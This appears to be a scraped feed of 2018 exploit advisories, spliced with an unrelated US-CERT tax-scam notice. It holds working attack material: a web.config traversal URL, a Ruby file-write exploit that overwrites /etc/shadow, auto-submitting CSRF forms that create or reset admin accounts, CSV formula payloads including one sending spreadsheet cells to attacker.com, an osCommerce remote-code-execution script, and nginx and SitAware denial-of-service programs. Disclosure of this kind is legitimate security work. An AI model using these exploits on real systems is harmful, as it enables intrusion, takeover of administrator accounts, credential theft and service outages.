DotNetNuke DNNarticle Directory Traversal

##############################

01. ### Advisory Information ###
Title: Directory Traversal Vulnerability in DNNarticle module
Date published: n/a
Date of last update: n/a
Vendors contacted: zldnn.com
Discovered by: Esmaeil Rahimian
Severity: Critical

02. ### Vulnerability Information ###

OVE-ID: CVE-2018-9126.

03. ### Introduction ###

DNN Article is not only a powerful module to enable post and manage
articles, but also provides total solutions for content management. Content
such as articles, news, announcements, product catalogs, etc can be
organized into unlimited levels of categories. New content can be moderated
before published. The administrator can assign roles as moderator. Also an
email can be sent when new content is added. Visitors can make comment and
rating. They can also agree or disagree an article. The product supports
common features of DotNetNuke module such as localization, portable
interface, search, Syndication etc. It can integrate with Twitter,
Facebook, Google Map, Windows Live Writer and DotNetNuke Journal to provide
more powerful functions for your portals. DNNArticle is an extendable
system. There are several sub modules shipped with DNNArticle standard
edition to provide rich and attractive look and feel experiences. There are
also several optional sub modules that provide more features. And the
number of optional sub modules is growing continually. There are also
several applications based on DNNArticle such as DNNArticle Blog and
DNNArticle Product. DNNArticle fully supports template and CSS theme. This
feature provides more flexibility for users to build more attractive user
interface.

zldnn.com

04. ### Vulnerability Description ###

The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote
attackers to read the web.config file, and consequently
discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.

05. ### Technical Description / Proof of Concept Code ###
desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3
with this link the attacker can see the web.config file and find DB name
and see the user name and passwords of DB

06. ### Affected Product Code Base ###
DnnArticle Module for DotNet Nuke – 11
Affected Component:
DNNArticle Module
[Attack Type]
Remote
[Impact Information Disclosure]
True
[Attack Vectors]
Attacker can see the web.config file that contain critical information
06. ### Credits ###

SecureHost[Research Team] – www.securehost.co

This vulnerability has been discovered by:
Esmaeil Rahimian – [www.securehost.co] – Rahimian(at)SecureHost(dot)co

Homematic CCU2 2.29.23 Arbitrary File Write

#!/usr/bin/ruby

# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300

# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite

require ‘net/http’
require ‘net/https’
require ‘uri’
require ‘json’

unless ARGV.length == 3
STDOUT.puts <<-EOF
Please provide url

Usage:
write_files.rb <ip.adress> <file path> <content of the file>

Example:
write_files.rb https://192.168.1.1 ‘/etc/shadow’ ‘root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::’

or

write_files.rb http://192.168.1.1 ‘/etc/shadow’ ‘root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::’

EOF
exit
end

# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + “/api/homematic.cgi”

# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]

# The third argument specifies the content of the file
homematic_file_content = ARGV[2]

# define the json body for the attack
body = {
“version”: “1.1”,
“method”: “User.setLanguage”,
“params”: {
“userName”: “file path”,
“userLang”: “file content”
}
}.to_hash

# define the traversal with the file you want to write
body[:params][:userName] = “../../../../../../../..” + homematic_file_path + “\u0000”

# define the content
body[:params][:userLang] = homematic_file_content

# split the uri to access it in a easier way
uri = URI.parse(url)

# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == ‘https’, :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|

# define post request
request = Net::HTTP::Post.new(uri.request_uri)

# define the content type of the http request
request.content_type = ‘application/json’

# define the request body
request.body = body.to_json

# send the request to the homematic ccu2
response = http.request(request)

# print response message code and status to cli
puts ‘Response code: ‘ + response.code + ‘ ‘ + response.message
end

Frog CMS 0.9.5 Cross Site Request Forgery

# Exploit Title:aa Cross Site Request Forgery- Frog CMS
# Date: 31-03-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE : CVE-2018-8908
# Category: Webapp CMS

1. Description

The application source code is coded in a way which allows malicious HTML
request to be executed without veryifying source of request.This leads to
arbitary execution with malicous request which will lead to the creation of
a privileged user.

2. Proof of Concept

Visit the application
Visit the Add Users Page.
Craft an html page with all the details for an admin user creation
and host it on a server
Upon the link being clicked by a logged in admin user, immidiately,
another admin user will get created.

Exploit Code:

<html>
<body>
<form action=”http://localhost/frog/admin/?/user/add” method=”POST”>
<input type=”hidden” name=”user[name]” value=”Test_1″ />
<input type=”hidden” name=”user[email]” value=”” />
<input type=”hidden” name=”user[username]” value=”test” />
<input type=”hidden” name=”user[password]” value=”test” />
<input type=”hidden” name=”user[confirm]” value=”test” />
<input type=”hidden”
name=”user_permission[administrator]” value=”1″ />
<input type=”hidden” name=”commit” value=”Save” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

3. Solution:

Solution – Fix & Patch: The application code should be configured to
implement anti csrf token to filter malicous HTTP Requests.

4. Public Reference with POC and steps:

http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html

Thanks and Regards
Samrat

WordPress Contact Form 7 To Database Extension 2.10.32 CSV Injection

# Exploit Title : Contact Form 7 to Database Extension WordPress Plugin CSV Injection
# Date: 23-03-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: None
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
# Version: 2.10.32
# CVE : CVE-2018-9035
# Category : webapps

Description
===========
Contact Form 7 to Database Extension is a WordPress plugin with more than 400.000 active installations. Development is discontinued since 1 year. Version 2.10.32 (and possibly previous versions) are affected by a CSV Injection vulnerability.

Vulnerable part of code
=======================
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.

Impact
======
Arbitrary formulas can be injected into CSV/Excel files.
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.

Proof of Concept
============
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. This will end up in the log, and if a WordPress administrator chooses to export this log as Excel/CSV file, the file will contain the formula. If he then opens the file, the formula will be calculated.

Example:

=cmd|’/C calc.exe’!Z0

or

=HYPERLINK(“http://attacker.com/leak?=”&A1&A2, “Click to load more data!”)

Solution
========

The plugin should escape fields starting with ‘=’ when it exports data to CSV or Excel formats.

Nginx 1.13.10 Accept-Encoding Line Feed Injection

// Underground_Agency (UA) – (koa, bacL, g3kko, Dostoyevsky)

// trigger nginx 1.13.10 (latest) logic flaw / bug
// ~2018

// Tested on Ubuntu 17.10 x86 4.13.0-21-generic

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <time.h>

int main(int argc, char **argv){
int sockfd, ret;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if(sockfd < 0){
perror(“socket”);
exit(EXIT_FAILURE);
}

struct sockaddr_in servAddr;
memset(&servAddr, 0, sizeof(servAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(atoi(argv[2]));
servAddr.sin_addr.s_addr = inet_addr(argv[1]);

ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr));
if(ret < 0){
perror(“connect”);
exit(EXIT_FAILURE);
}

char buf[2048];

strcpy(buf, “GET / HTTP/1.1\r\nHost: “);
strcat(buf, argv[1]);
strcat(buf, “\r\n”);
strcat(buf, “Connection: close\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\n”);

char *buf2 = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n”
“Accept-Encoding: gzip, deflate\r\n\rrrrr\r\r\r\r\\rr\rrrrrr” // bug
“Accept-Language: en-US,en;q=0.9\r\n\r\n”;

strcat(buf, buf2);

char recvbuf[1024];

ret = send(sockfd, buf, strlen(buf), 0);
if(ret < 0){
perror(“send”);
exit(EXIT_FAILURE);
}

printf(“Successfully sent data\n”);

ret = recv(sockfd, recvbuf, 1024, 0);
if(ret < 0){
perror(“recv”);
exit(EXIT_FAILURE);
}

printf(“Data: %s\n”, recvbuf);

close(sockfd);
exit(EXIT_SUCCESS);
}

Joomla Acymailing Starter 5.9.5 CSV Macro Injection

# Exploit Title: Joomla! Component Acymailing Starter 5.9.5 CSV Macro
Injection
# Google Dork: N/A
# Date: 22-03-2018
################################
# Exploit Author: Sureshbabu Narvaneni
################################
# Vendor Homepage: https://www.acyba.com
# Software Link: https://extensions.joomla.org/extension/acymailing-starter/
# Affected Version: 5.9.5
#Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-9107

1. Vendor Description:

AcyMailing is a reliable Newsletter and email marketing extension for
Joomla.
It enables you to efficiently manage an unlimited number of subscribers,
organize them into mailing lists, send personalized newsletters (Hi
{name}…)

2. Technical Description:

CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
the export feature in the Acyba AcyMailing extension before 5.9.6 for
Joomla! via a value that is mishandled in a CSV export.

3. Proof Of Concept:

Login as low privileged user who is having access to Acymailing Component.
Rename user name as @SUM(1+1)*cmd|’ /C calc’!A0.

When high privileged user logged in and exported user data then the CSV
Formula gets executed and calculator will get popped in his machine.

4. Solution:

Upgrade to version 5.9.6
https://extensions.joomla.org/extension/acymailing-starter/

5. Reference:
https://github.com/MrR3boot/CVE-Hunting/blob/master/AcyStarter-CSV.mp4
https://vel.joomla.org/articles/2140-introducing-csv-injection

Sureshbabu Narvaneni,
Security Analyst | Bug Hunter,
HackerOne (mrreboot/mrr3boot) | BugCrowd (Mr_R3boot)

osCommerce 2.3.4.1 Remote Code Execution

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell – https://scannell-infosec.net <[email protected]>
# Version: 2.3.4.1, 2.3.4 – Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the “install_4.php” script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = “http://localhost//oscommerce-2.3.4.1/catalog/”
target_url = “http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4”

data = {
‘DIR_FS_DOCUMENT_ROOT’: ‘./’
}

# the payload will be injected into the configuration file via this code
# ‘ define(\’DB_DATABASE\’, \” . trim($HTTP_POST_VARS[‘DB_DATABASE’]) . ‘\’);’ . “\n” .
# so the format for the exploit will be: ‘); PAYLOAD; /*

payload = ‘\’);’
payload += ‘system(“ls”);’ # this is where you enter you PHP payload
payload += ‘/*’

data[‘DB_DATABASE’] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
print(“[+] Successfully launched the exploit. Open the following URL to execute your code\n\n” + base_url + “install/includes/configure.php”)
else:
print(“[-] Exploit did not execute as planned”)

MiniCMS 1.10 Cross Site Request Forgery

<--
# Exploit Title: MiniCMS 1.10 CSRF Vulnerability
# Date: 2018-03-28
# Exploit Author: zixiani1/[email protected]@5ecurity.cni1/4
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# CVE : CVE-2018-9092

There is a CSRF vulnerability that can change the administrator account password
After the administrator logged in, open the following page
poc:
-->

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>test</title>
<body>
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
<input type="hidden" name="site_name" value="hack123" />
<input type="hidden" name="site_desc" value="hacktest" />
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />
<input type="hidden" name="user_nick" value="hack" />
<input type="hidden" name="user_name" value="admin" />
<input type="hidden" name="user_pass" value="hackpass" />
<input type="hidden" name="comment_code" value="" />
<input type="hidden" name="save" value=" " />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</head>
</html>

Systematic SitAware NVG Denial Of Service

# Exploit Title: SitAware NVG Denial of Service
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115

# Remarks: PoC needs bottlypy:
# https://bottlepy.org/docs/dev/
# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py

# Systematic’s SitAware does not validate input from other sources suffenciently. Incoming information utilizing
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until
# he tries to work with the situational layer.

#!/bin/python

from bottle import post, run, request, response

LHOST = 127.0.0.1 # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen

GET_CAPABILITIES = ”'<soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/”> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns=”http://purl.org/dc/elements/1.1/” xmlns:ns2=”http://purl.org/dc/terms/” xmlns:ns3=”http://tide.act.nato.int/schemas/2008/10/nvg” xmlns:ns4=”http://tide.act.nato.int/wsdl/2009/nvg”>
<ns4:nvg_capabilities version=”1.5″>
</ns4:nvg_capabilities>
</ns3:GetCapabilitiesResponse>
</soap:Body>
</soap:Envelope>”’

EVIL_NVG = ”'<soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/”> <soap:Body>
<ns3:GetNvgResponse xmlns=”http://purl.org/dc/elements/1.1/” xmlns:ns2=”http://purl.org/dc/terms/” xmlns:ns3=”http://tide.act.nato.int/schemas/2008/10/nvg” xmlns:ns4=”http://tide.act.nato.int/wsdl/2009/nvg”>
<ns4:nvg version=”1.5″ classification=”NATO UNCLASSIFIED”>
<ns4:multipoint points=”-0.01,0.01 0.02,-0.02 0.01,0.01″ symbol=”2525b:GFTPZ———X”
label=”EVILOBJ”/>
</ns4:nvg>
</ns3:GetNvgResponse>
</soap:Body>
</soap:Envelope>”’

@post(‘/nvg’)
def soap():
action = dict(request.headers.items()).get(‘Soapaction’)
action = action.replace(‘”‘, ”)
print(‘Incoming connection’)

response.content_type = ‘text/xml;charset=utf-8’

if action.endswith(‘nvg/GetCapabilities’):
print(‘Sending capabilities to victim’…)
return GET_CAPABILITIES
print(‘Done! Waiting for NVG request…’)
elif action.endswith(‘nvg/GetNvg’):
print(‘Sending evil NVG’)
return EVIL_NVG
print(‘Done!’)
else
print(‘Invalid request received’)

run(host=LHOST, port=LPORT)

Tax Guidance as Deadline Approaches

Original release date: March 30, 2018

As this year’s April 17 tax deadline approaches, NCCIC/US-CERT offers taxpayers guidance to help protect their personal, financial, and tax information. Hackers can take advantage of taxpayers by using social engineering scams to attempt to steal personally identifiable information. NCCIC encourages taxpayers to review the following resources and recommendations:

  • Avoid tax scams. Look for the telltale signs of tax scams:
    • emails that appear to come from your tax professional, requesting information for an IRS form
    • emails containing links to a supposed IRS website
    • bogus questionnaires claiming to be from the IRS or law enforcement agencies
    • calls where scammers leave urgent callback requests
  • Safeguard personal data.
  • Use strong passwords.
  • Keep software updated.

If you believe you have been a victim of an IRS-related phishing attempt, visit the IRS’s page at https://www.irs.gov/privacy-disclosure/report-phishing to report suspicious IRS-related communications.


This product is provided subject to this Notification and this Privacy & Use policy.